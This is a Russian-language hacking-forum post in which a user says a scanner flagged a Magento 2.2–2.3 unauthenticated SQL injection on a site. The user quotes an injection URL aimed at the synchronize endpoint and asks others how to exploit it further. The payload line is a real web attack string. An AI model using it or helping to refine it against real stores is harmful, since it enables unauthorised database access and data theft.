Тема
:
Вопросы по SQLMap
Показать сообщение отдельно
#
1077
03.11.2020, 11:28
Gigggs
Новичок
Регистрация: 12.01.2017
Сообщений: 10
С нами:
4912886
Репутация:
0
Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability
нашел видос и пару статей как раскрутить
вот к примеру
но ничего не выходт
вот как выглядит
https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3 *3
>8)+--+-
или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости
Gigggs
Посмотреть профиль
Репутация
Отправить личное сообщение для Gigggs
Найти все сообщения от Gigggs
Добавить в друзья